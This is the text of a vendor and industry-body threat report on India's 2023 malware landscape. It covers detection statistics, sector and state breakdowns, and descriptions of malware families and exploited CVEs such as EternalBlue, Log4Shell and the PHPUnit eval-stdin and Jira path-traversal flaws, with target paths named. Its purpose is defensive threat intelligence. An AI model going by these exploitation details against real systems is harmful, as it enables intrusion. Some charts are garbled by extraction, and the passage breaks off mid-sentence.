India Cyber Threat Report of 2024 with year

INDIA CYBER
THREAT REPORT
2023

Copyright ©2023
All rights reserved.
This report has been jointly developed by Data Security Council of India (DSCI) and SEQRITE.
The information contained herein has been obtained or derived from sources believed by DSCI and SEQRITE to be reliable. However, DSCI and SEQRITE disclaims all warranties
as to the accuracy, completeness, or adequacy of such information. We shall bear no liability for errors, omissions or inadequacies in the information contained herein, or for
interpretations thereof.
The information contain herein should not be relied upon as a substitute for specific professional advice. Professional advice should always be sought before taking any action
based on the information provided.
The material in this publication is copyrighted. You may not, distribute, modify, transmit, reuse, or use the contents of the report for public or commercial purposes, including
the text, images, presentations, etc. without prior consent from either DSCI and/or SEQRITE.

FOREWORD – DSCI
The report meticulously delineates prominent
classifications of malware and their
consequential impacts, providing insights into
both network and host-based exploitations,
Android-specific detections, zero-day
vulnerabilities pertinent to the Indian context.
The featured stories in the report offer in-
depth narratives on prevalent cyber threats.
These narratives dissect cryptojacking exploits,
anti-forensic activities, advanced persistent
threats, and various malicious activities
targeting specific sectors and technologies.
The report concludes with a glimpse into the
future, providing predictions and insights
into cyber threats anticipated for 2024,
empowering us to stay ahead in our security
measures. It serves as a compass, guiding
our actions and fortifying our cybersecurity
posture.
VINAYAK GODSE
Chief Executive Officer,
Data Security Council of India
to conduct a detailed study of India’s cyber
threat landscape and present our analysis very
specific to Indian context covering the states,
cities, and industry segments.
Malware stands as a significant peril to the
integrity of digital systems, with cybercriminals
engineering increasingly intricate and diverse
attack methodologies. Every day, over half a
million instances of malware are discovered,
adding to the already staggering one billion
circulating malware programs. As depicted
in the report, there is a significant rise in
behaviour-based detection compared to
signature-based detections owing to the surge
in constantly mutating malware variants such
as polymorphic malware, zero-day exploits,
fileless attacks. The report delves into serious
threats posed by ransomware attacks. It is
evident from the analysis that ransomware
hit rate is higher compared to other malware
categories as ransomware detection is still
evolving. The geographical analysis presents
the top states and cities with highest detection;
however, it also underlines the fact that BYOD,
work from home trends resulting in Tier II/
III cities are in the ambit of cyberattacks. The
digitization drive across industry segments
is exposing traditional industries such as
automobiles, manufacturing, healthcare to
cyber threats.
As India advances its digitalization efforts across
sectors, a pervasive outbreak of cyberattacks
has inflicted substantial financial losses on
businesses. Cybersecurity has ascended to a
strategic concern at the board level owing to
the multifaceted nature of cyber threats and the
escalating monetary repercussions stemming
from data breaches. For the purpose of this
report, DSCI in collaboration with SEQRITE
analysed approximately 400 million malware
detections from over 8.5 million SEQRITE
endpoint installations in India. Our objective was

FOREWORD – QUICK HEAL
I thank the entire team at DSCI and experts at our
Labs to have researched and published threat
intelligence for the Indian market. This report will
dive deeply into the world of ever evolving threats
in the Indian context, share predictions and
recommendations for individuals, businesses and
government organizations to stay a step ahead of
prevalent risks during current and future times.
Backed by our patents and international
certifications and a legacy of nearly three
decades, our award-winning solutions are truly
made-in-India for the world. I am confident that
with our rigorous R&D efforts, focus to innovate
future-ready technologies, and round-the-clock
technical support, our solutions are capable of
mitigating new and emerging threats.
Our commitment to securing India goes hand
in hand with our dedication towards innovation
thereby creating solutions that promise a
sustainable future. Our insights forged at
our Labs form the cornerstone of our deep
understanding of the evolving threat landscape.
Recently, our team has patched two Zero Day
vulnerabilities and is the only cybersecurity
solution provider world over to have found a
solution for Expiro Infector. In addition, we are
the first and only Indian company to have been
invited to collaborate with the Govt. of USA on
NIST-NCCOE’s Data Classification Project.
I take immense pride in our role as guardians of
the critical infrastructure of our nation through
our enterprise cybersecurity brand, SEQRITE.
Safeguarding the digital backbone of our country
is not just a responsibility; it’s a commitment to
ensuring the resilience of our nation in the face of
evolving cyber threats.
As we navigate the ever-changing digital age,
SEQRITE remains steadfast in its commitment to
innovation, simplification, and securing all.
Sincerely,
DR. SANJAY KATKAR
Jt. Managing Director,
Quick Heal Technologies Limited
In line with the Hon’ble Prime Minister, Shri
Narendra Modi’s vision of cyber-safe India, at
SEQRITE, the enterprise cybersecurity arm of
Quick Heal, we envision a future where cyber
safety is not just a privilege but a fundamental
right for all. It is with great pride and a sense of
responsibility that I share with you deep insights
derived from the country’s largest Malware
analysis lab, SEQRITE Labs, in collaboration with
Data Security Council of India (DSCI).

From CEO’s Desk – QUICK HEAL
Therefore, it is with great pleasure that we present to
you this Threat Report, a collaborative effort between
SEQRITE and DSCI, drawing on the invaluable insights
from SEQRITE Labs, the country’s largest Malware
Analysis Lab to equip businesses with India centric
knowledge and actionable recommendations to
fortify their cybersecurity posture.
This report stands as a testament to the diligence
and dedication of our researchers and experts,
whose tireless efforts have allowed us to compile
a comprehensive analysis of cyber threats in the
Indian landscape. The wealth of data, statistics, and
telemetry from approximately nine million endpoints
forms the backbone of this report, providing a
unique and detailed perspective on evolving cyber
threats.
The report delves into the geographic and sectoral
impact of cyber threats, shedding light on the top
states, cities, and industries targeted throughout the
year. From our analysis, it’s evident that no region
or sector is immune to the reach of these malicious
attacks.
In addition, our commitment to ensuring holistic
protection is reflected in the multiple layers of
detection and protection mechanisms employed
against sophisticated malwares. Notably, on the
Android front, we’ve observed a significant increase
in Adware and Potentially Unwanted Applications
(PUAs). Shockingly, fake and malicious applications
including SpyLoan and HidAdd apps hosted on
Google Play Store, have been downloaded by
millions of unsuspecting users. Our researchers at
SEQRITE Labs have identified and got numerous such
malicious apps removed from Google Play Store.
Furthermore, the influence of geopolitical events,
such as the Russia-Ukraine and Israel-Hamas
conflicts, have cast a shadow on the global
cybersecurity landscape. Despite India’s diplomatic
balancing act, our government and private entities
have faced cyber threats from actors supposedly
affiliated with the warring parties.
The report also uncovers cyber space violations
during significant social and national events,
including the G20 summit hosted by India. Central
and state government websites experienced
DDoS attacks, defacements, and an overall surge
in attacks, aiming to tarnish the country’s image
during pivotal national and global occurrences.
We stand committed to simplifying cybersecurity
for enterprises, government organizations and
public sector entities by providing comprehensive
and innovative solutions that are powered by
state-of-the-art threat intelligence and play books
backed by world-class service provided by the
best-in-class security experts.
We extend our heartfelt gratitude to DSCI for their
collaborative efforts and to the dedicated team at
SEQRITE Labs for their unwavering commitment
to creating excellence in cybersecurity. In light of
this collective endeavor to safeguard our digital
landscape, I sincerely hope that this report serves
as a valuable resource for our common goal of
creating a safe country and a safe world.
Sincerely,
VISHAL SALVI
Chief Executive Officer,
Quick Heal Technologies Limited
India’s rapidly growing digital ecosystem
has proved to be a boon to its economy and
is estimated to contribute over 20% to the
country’s GDP by 2026. However, with digital
evolution, India has also emerged as the most
targeted country in terms of cyberattacks,
accounting for 13.7% of all attacks worldwide.
Indian government agencies witnessed 95%
increase in cyberattacks in 2022, as compared
to the previous year. Industries including
healthcare, education, research, government,
and military sectors have emerged as the
most vulnerable, followed by agriculture,
logistics, transportation, the energy industry
at large, high-tech enterprises, pharmaceutical
companies, and manufacturers of medical
equipment.

Executive Summary 8
Cybersecurity Outlook: Mapping the India Malware 13
Landscape 2023
The Anatomy of Threats 17
India Malware Landscape 33
Geographical Analysis 34
Sectoral Analysis 36
Featured Stories - 2023 41
Cyber Threat Predictions for 2024 67
Now to Next: Future Directions for CISOs 73
Contents

Executive Summary Cybersecurity Outlook Threat Anatomy Malware Landscape Featured Stories Threat Predictions Now to Next
INDIA CYBER THREAT REPORT 2023
8
Executive Summary
The DSCI-SEQRITE India Cyber Threat report
is instrumental in gaining a comprehensive
understanding of the current cybersecurity
landscape, particularly within the Indian context.
It offers valuable insights into emerging trends
related to threats, the activities of threat actors,
vulnerabilities and cybersecurity incidents.
The report integrates strategic and technical
components, making it accessible to both technical
and non-technical audiences. It goes beyond the
surface by identifying and elucidating the top
threats, delving into the specifics of threat actors’
motivations and attack techniques. Furthermore,
the report provides a thorough exploration of
specific sectors and geographies.

9
> 400 million
detections across
~8.5 million
endpoints
761 detections
Averaging
per minute
~49 million
detections stem from
behaviour-based analysis,
constituting
12.5%of all
Ransomware & Malware
Ransomwares authors continually evolve their methodologies and employ sophisticated techniques to evade
traditional signature-based detection.
~1 per 650 detections
Ransomware incident ratio
~1 per 38,000 detections
Malware incident ratio
Emerging as a signiﬁcant threat with
over 5 million detections in a year
Cryptojacking
Attack
Vectors
Mobile
Threat
Landscape
>50%
41% Trojans
33% Infectors
Malware Attack Spectrum
Top Three Industries
Key Highlights
Dominant Threats
& 15% Telangana
14% Tamil Nadu
Geographical Hotspots
& 15% Surat
14% Bengaluru
City-wise Analysis
&
of detections are
associated with removable
media and network drives.
~3
An average of
per Android device
in a month
~25%
of attacks result from
clicking on malicious links
in emails and websites.
attacks
Automobile Government Education
9

10
The report presents a comprehensive
analysis of malware threats based
on the data collected by SEQRITE
Labs reporting 400 million malware
detections based on 8.5 million
endpoints, averaging 761 detections
every minute. The detections were
examined under different subcategories,
assessing the impact on various industry
segments including government
agencies. Additionally, the threat
landscape across states and cities were
explored, highlighting notable instances
such as APTs in action, Cryptojacking,
Ransomware attacks, the resurgence of
old viruses, fake lending apps, and more.
2023 witnessed a pronounced increase in
global threat vectors, largely influenced
by significant geopolitical developments
worldwide, including Russia’s invasion
of Ukraine. Specifically, within India, the
G20 summit became a central stage for
geopolitical events, garnering substantial
attention regarding cyberattacks on
India’s digital infrastructure. During this
period, there was a marked increase in
both the frequency and sophistication
of cyber threats, contributing to the
proliferation of criminal activities such
as extortion, espionage, and frauds on a
broader scale.
The current state of solutions against malwares
face challenges with signature-based approaches,
given the agility of malware creators in manipulating
signatures. Behavioural analysis is the proactive
approach that involves scrutinizing behavioural
patterns associated with potential threats,
recognizing the deception tactics employed by
contemporary malware against traditional signature-
based detection systems. Behavioural-based
detection technologies constituted over 12.5% of
detections in 2023 (approximately 49 million
instances).
Next-Generation Antivirus (NGAV) solutions
are equipped with behaviour-based detection
components to identify these advanced
malwares based on the traits. Behaviour-
based detection observes system activities to
differentiate between normal and abnormal
behaviour, thereby aiding in the identification of
potential threats. This approach utilizes Artificial
Intelligence (AI) and Machine Learning (ML) to
analyze large data sets and identify patterns
that deviate from the norm, indicating potential
malicious activities.
Ransomware persistently upholds its position as one
of the most pernicious manifestations of cybercrime.
A single ransomware security incident emerges
for every cluster of 650 detections. Whereas the
occurrence of a malware incident is considerably less
frequent, materializing only once amidst a staggering
38,000 detections.
Crypto Miners and Cryptojacking: Cryptojacking
is a prevalent stratagem where an adversary
deploy malevolent crypto mining software
to an unsuspecting victim’s device to mine
cryptocurrency coins without their permission.
Crypto miners are surfacing as a tenacious menace
in the cyberthreat panorama. They impact all
significant computing systems and can remain
undetected for an extended period of time.
Despite the fluctuations in cryptocurrency values
throughout 2023, the large-scale deployment of
crypto miners can yield substantial financial gains
for threat actors. Regardless of market shifts,
cryptocurrency remains paramount. Crypto mining
has evolved to be more resource-demanding and
consequently more expensive. Attackers have
started to infiltrate multiple victims’ environments
to install miners and misappropriate the necessary
computing resources.
The year also witnessed detections
associated with CryptoNight, a mining
algorithm employed to secure networks
and authenticate transactions in certain
cryptocurrencies like Monero and Webchain.
This included a surge in the usage of the
Webchain miner and several XMRig-based
miners. XMRig, a widely used open-source tool
for mining cryptocurrencies including Bitcoin
and Monero, is currently one of the most
exploited coin miners by threat actors.
Observations 2023

11
Industry Trends
Automotive Industry: Over the past
three to four years, the global adoption of
Industry 4.0 has marked a transformative
trend, witnessing extensive digitalization
integration across industries. The industry,
once considered relatively secure, now
faces escalating cyber threats. In 2023, a
notable surge in cyber-attacks targeted the
automotive sector, marking a shift from
its earlier perceived safety. Supply chains
within the automotive industry experienced
the highest number of detections,
surpassing government agencies and the
education sector.
State-Backed Threats in India: India,
particularly vulnerable to state-backed
threat actors, witnessed an increased focus
on government agencies and defense
organizations.
Education Sector: The sector contends with
common threats such as phishing. Account
compromise, fuelled by high turnover,
is a prevailing challenge. W32.Neshta.C8
emerged as a significant threat within this
sector.
Power and Energy Sector: The critical
power and energy sector in India, pivotal
for economic growth, faces cyber threats
targeting diverse verticals, including supply
chain, cloud, legal, IT, and OT. The sector
continues to grapple with the risk of cyber
supply chain vulnerabilities, with the Expiro
infector variant being particularly prevalent.
Healthcare Sector: As India advances
in digitizing healthcare, securing online
systems becomes imperative. Nearly
60% of healthcare organizations in India
encountered cyberattacks in the past year,
with the Nimda variant posing a significant
threat.
Manufacturing Sector: Indian
manufacturing firms confront heightened
risks due to unsecured IoT devices in
their networks. The implementation
of 5G technology raises concerns
about exacerbating existing security
vulnerabilities. Ransomware attacks have
disrupted manufacturing operations,
especially impacting Small and Medium-
sized Enterprises (SMEs), while sophisticated
phishing attacks target SMEs within the
sector.
Logistics, Banking, and Financial
Sector: Beyond manufacturing, the
logistics, banking, and financial sectors are
susceptible to cyberattacks. The financial
sector’s digital transformation and the rise
of the platform economy have elevated
cyber threats on low-value transactions.
India has been a significant target for Advanced
Persistent Threats (APTs). Throughout 2023,
entities associated with various nations
consistently conducted computer network
operations, emphasizing the vital role these
operations play in fulfilling national objectives.
Adversaries have carried out a variety of
attacks, including destructive, espionage, and
information operations characterized by a
marked increase in the scope and scale of their
espionage activities.
The cybersecurity landscape has been
significantly influenced by the extensive
integration of Android devices, constituting
nearly 71% of the global market. The analysis
conducted, based on 500K installations, reveals
a discernible uptick in Adware and Potentially
Unwanted Applications (PUAs), highlighting
the persistent prominence of malware as a
significant threat. The data indicates an average
of 2-3 monthly attacks on Android mobiles,
posing a substantial risk to corporate networks,
especially considering the widespread utilization
of mobile devices for office work.
The cybersecurity
landscape has been
significantly influenced by
the extensive integration
of Android devices,
constituting nearly 71% of
the global market.

12
1. Ransomware continues to pose a significant
threat to organizations, with the cost of
attacks expected to rise. Key trends include
increased targeting of critical infrastructure
and the rise of Ransomware-as-a-Service
(RaaS), which lowers entry barriers for
cybercriminals. Double extortion tactics are
also on the rise where attackers encrypt
and steal victims’ data. The need for robust
cybersecurity measures is underscored
by the evolving threat landscape and the
anticipated persistence of these threats.
2. AI-powered malware like BlackMamba poses
significant threats, using AI for evasion
and creating unique payloads. It uses AI to
capture keystrokes, potentially infiltrating
Android OS. As AI evolves, phishing tactics
are expected to become more personalized
and effective.
3. ‘Living off the land’ binaries like Powershell
and Certutil pose considerable risks, being
exploited to disable security measures and
conduct malicious activities. The recent
DarkGate malware and Cobalt Strike used
these binaries to compromise systems,
indicating a potential increase in such attacks
in 2024.
4. Multi-Factor Authentication (MFA) fatigue
attacks are a rising cybersecurity concern,
where hackers inundate victims with
repeated second-factor authentication
requests, coercing them into granting access.
Predictions 2024
As we move into this
new era of AI-generated
media, we must balance
innovation with integrity
and verify the source of
all communication.
5. Looking ahead to 2024, AI-generated voice
and video scams are emerging as a significant
threat. These scams use advanced deep
learning techniques to imitate trusted
individuals, thus deceiving targets into
revealing sensitive information or taking
undesired actions.
6. Significant democratic events, such as
elections, inevitably draw the attention of
adversaries. The upcoming 2024 Indian
Elections are no exception and are poised to
witness a surge in cyberattacks, particularly in
the form of phishing emails and malvertising.
Artificial intelligence (AI) tools are increasingly
being leveraged to scale up such attacks,
making them more sophisticated and difficult
to detect.
7. Supply chain vulnerabilities are a growing
concern in cybersecurity, leading to targeted
attacks with widespread consequences. The
rise in such attacks call for new regulations and
global collaboration between governments
and private industries. Supply chains offer
attackers the opportunity for one-to-many
attacks, a trend expected to escalate in 2024.
8. Zero-day vulnerabilities are increasingly
being exploited by cybercriminals and state-
sponsored groups for persistent access
to networks. This allows them to operate
undetected, extract valuable information, and
demand higher ransoms. The trend is expected
to grow with a focus on exploiting cloud
infrastructure misconfigurations.
9. A concerning development in the
cybersecurity landscape is the growing
prevalence of the underground economy,
where corporate assets are auctioned,
and breach datasets are openly traded.
This surge is particularly evident in the
increased auctioning of corporate access
and the sale of breach datasets, driven by
escalating demand for services such as
penetration testing, zero-day exploits and
RaaS (Ransomware as a service) within the
underground market. Consequently, there
has been a notable rise in ransomware
infections and instances of unauthorized
access to sensitive networks, as acquired
access is actively traded in underground
forums.
10. Phishing attacks are increasing, often using
personal data from social media to gain
trust. As generative AI improves, it will be
used more in scams, including mimicking
voices. The dating app scams are also
expected to rise.

13
Cybersecurity
Outlook:
Mapping the India Malware
Landscape 2023

14
Malware Detection Overview
To arrive at the cyber threat
landscape of India for the year 2023,
a substantial 400 million instances
of malware were observed across
an extensive network of 8.5 million
endpoints.
Behavioural Detection (NGAV)
played a pivotal role, contributing to
49 million1
of the total detections.
2023 Total
Malware
Detections
~400M
12.5%
87.5%
Behaviour-based
detections
Signature-based
Detections
1
These detection capabilities were arrived through SEQRITE’s cutting-edge technologies including Endpoint Security Server, amongst others to provide a comprehensive approach securing both on-
premise and cloud environments.
8.5 Million Endpoints
2023 TOTAL MALWARE DETECTIONS

15
Scan Wise Detections
Subcategory
Percentage
Detections
Inferences
Network Scans 54.5%
Monitoring and safeguarding
network traffic is vital.
Behavioural Detection 12.5%
Behaviour-based analytics are
effective for malware detection.
Real-Time Scans (RTS) 12%
RTS promptly detects and
neutralize threats, ensuring swift
response and ongoing protection.
Web Scans 10%
Web scans for malware
proactively safeguard users and
data by identifying and mitigating
online threats.
On-Demand Scans 3%
On-demand malware scans
provide users with flexible,
manual threat detection for
added control and security.
Email Scans 5%
Email remains a vector of
concern, with significant number
of malware instances detected
through vigilant email scanning.
Memory Scans 3% Adversaries are actively targeting
threats operating in memory.
Breakdown of Scan-Wise Detections:
54.5%
3%
5%
12%
12.5%
10%
3%
Network Scans
Email Scans
Memory Scans
Real-Time Scans
(RTS)
Behavioural
Detection
Web Scans
On-Demand
Scans
SCAN-WISE DETECTIONS

16
Corporate Network
EPS Client EPS Client
Rules Alerts
Endpoint Security
Server
Roaming Platform
EPS Client
Users working
from Home / Travelling
Admin Sets Rules
& Policies
ENDPOINT ARCHITECTURE

17
The Anatomy
of Threats

18
Examining Malware Subtypes 2023
The section on malware subcategories elaborates on the current landscape of digital threats, sheds light
on the prevalence of various malicious entities, and their potential impact on computer systems.
41%
03%
Trojan
Alarming others
33%
11%
07%
05%
Infector
Worm
PUA
Exploit
Ransomware
Adware
Cryptojacking
MALWARE SUBTYPES 2023 (DETECTIONS) DISSECTING THE 7.53 MN DETECTIONS OF "ALARMING OTHERS FAMILY"
0.74 mn
1.50 mn
5.28 mn
*The reported count reflects Quick Heal installations and is based on data spanning from October 2022 to September 2023. Users are advised to consider the limited scope of this data for comprehensive insights.

19
Trojan (111.19 million): The prominence of Trojan highlights the
sophistication of deceptive tactics employed by cybercriminals. Users
must exercise caution when downloading and installing software to
avoid falling victim to such threats.
Robust endpoint security solutions are crucial to detecting and neutralizing
Trojan attacks before they can compromise sensitive data.
Infector (91.40 million): Infectors pose a significant risk to the integrity
of files and the overall health of computer systems.
Regular system scans and the use of reputable antivirus software is essential
to identify and eradicate infections promptly. Additionally, user education
on safe browsing practices can help prevent inadvertent execution of
infected programs.
Worm (29.62 million): The self-replicating nature of worms
necessitates a proactive approach to network security.
Deploying firewalls, intrusion detection systems, and network segmentation
can limit the spread of worms and minimize the potential for widespread
damage.
PUA (Potentially Unwanted Application) (19.48 million): Potentially
Unwanted Applications may not be explicitly malicious, but their impact
on system performance and user experience can be detrimental.
Organizations should implement strict software controls and educate users
about the risks associated with downloading and installing applications
from untrusted sources.
Exploit (14.47 million): Exploits targeting software vulnerabilities
demand constant vigilance in terms of software updates and patch
management.
Time effective application of security patches is critical to close potential
entry points for exploit-based attacks.
Alarming Others (7.53 million): This category, comprising
Cryptojacking, Adware, and Ransomware, represents a multifaceted
threat landscape.

Cryptojacking (5.28 million): The prevalence of cryptojacking
emphasizes the importance of monitoring system resources and
utilizing endpoint security solutions capable of detecting and
blocking unauthorized cryptocurrency mining activities.

Adware (1.50 million): It can be tackled by using ad blockers and
security solutions capable of identifying and eliminating adware
components.

Ransomware (0.74 million): Ransomware’s potentially devastating
impact on organizations reinforces the need for robust backup
strategies, employee training on recognizing phishing attempts,
and advanced endpoint protection to inhibit ransomware attacks.

20
Behaviour Based Detections
In the ever-evolving landscape of cybersecurity, the limitations of
conventional detection techniques have prompted the integration of
advanced methodologies to enhance the efficacy of anti-malware systems.
Traditional approaches, such as signature-based methods, excel in
identifying known malware patterns. However, their inherent limitation
lies in their inability to effectively detect unknown or polymorphic malware
strains that continuously mutate to evade signature recognition.
To address these challenges, machine learning methods are being
seamlessly integrated with existing detection mechanisms. While heuristic-
based methods offer a promising avenue for identifying new malware
variants, their susceptibility to high rates of false positives and false
negatives necessitates the development of more precise and adaptive
detection strategies. This imperative has led to the emergence of behaviour-
based detections, which focus on analyzing the dynamic actions and
patterns exhibited by potential threats, thereby offering a proactive and
comprehensive defense. This synergy of machine learning and behavioural
analysis marks a pivotal shift towards a more resilient and responsive
approach.
2021
2022
2023 49 mn
13 mn
5 mn
BEHAVIOUR-BASED DETECTIONS
In 2023, over 12.5% of detections (~49 million) are attributed
to behaviour-based components. Over the years, we can see that
behaviour-based detections have increased. It signifies that over the
years, these technologies will evolve and would be more potent to
tackle the latest malwares. Conventional static file-based detection
methods have constraints to detect sophisticated malwares with
custom packers and obfuscation.
NGAV solutions are equipped with behaviour-based detection
components to detect sophisticated malwares based on their
characteristics.
Listed below are some of the malware variants detected by NGAV
which otherwise are difficult to detect with conventional methods.
Polymorphic Malware Variants: These malwares are known
for their ability to continually alter their characteristics to evade
detection. Despite being derived from known malware families,
their signatures are modified with each iteration, rendering them
invisible to signature-based detection systems.
Code Obfuscation: It is a strategy used to dodge detection
and analysis. By making the source code extremely hard to
comprehend or even illegible, it can bypass tools that perform
static analysis.

21
Fileless Attacks: These attacks employ macros, scripting engines,
in-memory execution and utilizes “living off the land” binaries and
leave no minimal traces on the disk.
Zero-Day Attacks: These are novel or unidentified attacks that
have not been recorded in signature databases yet represent
significant challenge for traditional antivirus solutions.
LOLbins or Living Off the Land Binaries: LOLbins are non-
malicious system tools that cyber criminals can exploit to hide
their malicious activities. They can execute code, perform file
operations, steal passwords, and bypass detection. Often, these
are Microsoft-signed binaries like Certutil and WMIC. LOLbins
are challenging to detect and terminate because they use local
and trusted processes. Even if detected, they should only be
terminated, not quarantined, leaving the system vulnerable to
further attacks until the parent process initiating the malicious
operation is terminated. The only effective countermeasure is
to detect them during malicious activity, terminate the process
immediately, and quarantine the parent process or program. This
can be achieved through deployment of NGAV Solutions.
21

22
TOTAL DETECTIONS
708
971
1103
939 962 995
869
971
1070
928 903
722
TOTAL MALWARE INCIDENTS
37.97 mn
33.67 mn
32.84 mn
36.68 mn
35.32 mn
36.24 mn
44.93 mn
33.89 mn
30.96 mn
33.06 mn
29.17 mn
30.82 mn
TOTAL MALWARE DETECTIONS
163
302 301
219
191 181
138 148
185 198
155 166
TOTAL INCIDENTS
90588 83985
128287
117529
113313
115003
316105
108189
165634
99463
89327 96295
Malware and Ransomware Analysis (Year 2023)
Decrypting the Menace: Unveiling the Inherent Risks of Ransomware
Ransomware ~1
incident per 650
detections
Malware ~1
incident per 38000
detections
This section examines incident trends and detections from December 2022 to November 2023, focusing on the total incidents vs. total detections ratio as a key
measure of detection efficiency. The prevalence of ransomware is higher due to its increased difficulty of detection in comparison to conventional malware.
A lower ratio
signals a more
effective detection
mechanism, implying
a higher success
rate in identifying
attacks.

23
~95 mn detections can be contributed to the below list of Malwares
Detections: 50.70 mn
Threat Level: Medium
Category: File Infector
Method of Propagation: Removable or
network drives
Behaviour: The malware injects its code to
files present on the disk and shared network.
It decrypts malicious .dll present in the file and
drops it. This .dll performs malicious activities
and collects system information and sends it to
a ‘CNC’ server.
Detections: 6.21 mn
Category: Worm
Method of Propagation: Malicious links in
instant messenger
Behaviour: Malware drops file in system32
folder and executes it from dropped location.
It connects to malicious website, also modifies
browser home page to another site via registry
entry. It also creates Run entry of the same
dropped file for persistence.
Detections: 8.40 mn
Threat Level: High
Category: Worm
Method of Propagation: Removable or network
drives
Behaviour: It copies itself to following paths:
<System>explorer.exe, <Windows>svchost.
exe, <Windows>spoolsv.exe, It adds these paths
to RunOnce registry. It can capture the activity
like keyboard/mouse inputs, including screen
capturing and pass it to the remote intruder.
Drops a copy of itself on other machines in
network through writable shared drives and
further uses sc.exe to remotely execute as a
service.
Detections: 7.71 mn
Threat Level: High
Category: Trojan
Method of Propagation: Email attachments
and malicious websites
Behaviour: Creates a process to run the
dropped executable file. Modifies computer
registry settings which may cause a system
crash. Downloads other malwares like
keyloggers. Slows down the booting while
shutting down the process of the infected
computer. Allows hackers to steal confidential
data like credit card details and personal
information from the infected system.
Detections: 3.38 mn
Category: Worm
Method of Propagation: Emails and malicious
websites
Behaviour: It drops and replicates itself in
the “%APPDATA%temp” directory. This then
extracts an inner file named “uihost64.exe” and
“uihost32.exe”, storing them in the Temp folder.
To ensure persistence, it alters a registry key:
Registry Entry: <HKCU>SoftwareMicrosoft
WindowsCurrentVersionRun
Detections: 7.63 mn
Threat Level: High
Category: Trojan
Method of Propagation: Email attachments
and malicious websites
Behaviour: Uses cmd.exe with “/c” command
line option to execute other malicious files. It
simultaneously executes a malicious .vbs file
with name “help.vbs” along with a malicious
.exe file. The malicious .vbs file uses Stratum
mining protocol for Monero mining.
W32.Pioneer.CZ1 Worm.AUTOIT.Tupym.A
W32.Mofksys Trojan.Starter.YY4 Nsis.Bitmin
LNK.Cmd.Exploit.F

24
Detections: 2.33 mn
Category: Worm
Method of Propagation: Spreads through
emails
Behaviour: The worm spreads by sending
email attachments with name ‘README.EXE’.
It exploits CVE-2001-0154 by setting unusual
MIME header type to HTML email containing the
executable attachment. The worm infects files
on victim machines and network drives.
Detections: 2.05 mn
Category: Virus
Method of Propagation: Spreads through
emails
Behaviour: It sends a copy of self as an email
attachment to email ids present on the victim
contact lists. It drops the copy at %system%
folder as ‘runouce.exe’ with hidden attributes.
Creates mutex with name ‘ChineseHacker-2’.
Detections: 1.53 mn
Category: Virus
Method of Propagation: Removable or
network drives
Behaviour: Copies virus code at the start of
clean file and keeps clean file at the end of the
file. Drops files at paths: <Windows>svchost.
com and <Windows>directx.sys.
HTM.Nimda.A W32.Runouce.B W32.Neshta.C8
A significant portion, over 50%, of the detected threats stem
from removable media and network drives, highlighting potential
vulnerabilities in external storage and network security. Approximately,
25% of detections result from engaging with malicious links in emails
and websites, highlighting the critical role of robust email and web security
TOP 10 FILES COMMONLY FOUND WITH MALICIOUS CODE
clean.
exe
KMS-
R@1n.
exe
SECOH-
QAD.dll
DOC001.
exe
SECOH-
QAD.exe
utopico.
exe
SppExt-
ComOb-
jHook.dll
mssecsvc.
exe
DriverPac-
kNotifier.
exe
Service_
KMS.exe
measures. Additionally, around 20% of the identified threats propagate
through emails using file infectors. Of particular concern, 26% of these
detections fall into the category of high-threat incidents, warranting
immediate attention.

25
Top Network Based Exploits
225 mn
175 mn
As organizations navigate the intricacies of complex network infrastructures, identifying and comprehending the methodologies employed by cyber
adversaries is crucial. This section delves into specific exploits that pose significant risks to network security.
CVE-2017-0147 highlights an information
disclosure vulnerability within the Microsoft
Server Message Block 1.0 (SMBv1) server.
The vulnerability originates from the
server’s handling of particular requests,
providing an avenue for attackers to create
a specifically tailored packet. Exploiting this
vulnerability has the potential to lead to the
disclosure of information from the server.
Typically, this exploitation scenario entails
an unauthenticated attacker transmitting
the specially crafted packet to a designated
SMBv1 server.
CVE-2017-0144, known as EternalBlue, a critical security
vulnerability affecting Microsoft Windows operating
systems, particularly in the Server Message Block (SMB)
protocol. Exploitation of EternalBlue enables remote
attackers to execute arbitrary code on a target system
without user interaction. The most notable instance
of this exploit was witnessed during the WannaCry
ransomware attack in May 2017, where the malware
rapidly spread across unpatched systems, encrypting
files and demanding ransom payments. This incident
underscores the significance of promptly applying
security updates to mitigate known vulnerabilities.
Server Message Block | WannaCry
ransomware attack in May 2017
SMB/EternalBlue.UN!SP.31780
SMB/Autoblue.UN!SP.30735
SMB/CVE-2017-0147-EC.WIN!KP.1912
Mailchimp Servers, eCommerce Modules in
Drupal, Jira Server, LDAP Servers, DB Files
Network Exploit Detections
SMB/CVE-2017-0147-EC.WIN!KP.1912 175 mn
SMB/EternalBlue.UN!SP.31780 155 mn
SMB/Autoblue.UN!SP.30735 65 mn
HTTP/CVE-2017-9841.RCE!PT.42647 1.3 mn
HTTP/CVE-2021-26086.Jira!PT.44523 .1 mn
HTTP/CVE-2021-44228.RCE!AW.45158 .4 mn

26
1.8 mn
HTTP/CVE-2017-9841.RCE!PT.42647
CVE-2017-9841, is a critical code injection vulnerability found
in Util/PHP/eval-stdin.php; the vulnerability allows remote
attackers to exploit the flaw by sending HTTP POST data
beginning with a ‘<?php ‘ substring. An unauthenticated
attacker, gaining access to the /vendor/phpunit/phpunit/
src/Util/PHP/eval-stdin.php URI, could execute arbitrary PHP
code. This security risk impacts the Mailchimp and Mailchimp
E-Commerce modules in Drupal, collectively used by a
substantial number of sites. The vulnerability is attributed to
the use of the php://input wrapper in the /phpunit/src/Util/
PHP/eval-stdin.php file, with patched versions of PHPUnit
addressing the issue by adopting the php://stdin wrapper.
HTTP/CVE-2021-26086.Jira!PT.44523
This detection pertains to CVE-2021-26086, a path traversal
vulnerability in Jira Server and Data Center that exposes a
critical security flaw. Actively exploited, this vulnerability
allows remote attackers to read arbitrary files on the server by
sending a specifically crafted HTTP request to the /WEB-INF/
web.xml endpoint.
HTTP/CVE-2017-9841.RCE!PT.42647
HTTP/CVE-2021-26086.Jira!PT.44523
HTTP/CVE-2021-44228.RCE!AW.45158
HTTP/CVE-2021-44228.RCE!AW.45158
CVE-2021-44228, also known as Log4Shell is critical remote code execution
vulnerability affecting systems that use Apache Apache Log4j2 versions,
where the JNDI features used in configuration, log messages, and
parameters lack protection against attacker-controlled LDAP and other JNDI-
related endpoints.

27
Top Host Based Exploits
This section casts a spotlight on Host-Based Exploits, a critical facet of the digital threat
landscape. Examining the detections of prominent host-based exploits, including LNK.Exploit.
Gen, LNK.Cmd.Exploit.F, LNK.Exploit.Cpl.Gen, LNK.USB.Exploit, and JPEG.Exploit.ms04-028,
the focus laid on understanding the prevalence and impact of these exploits on individual
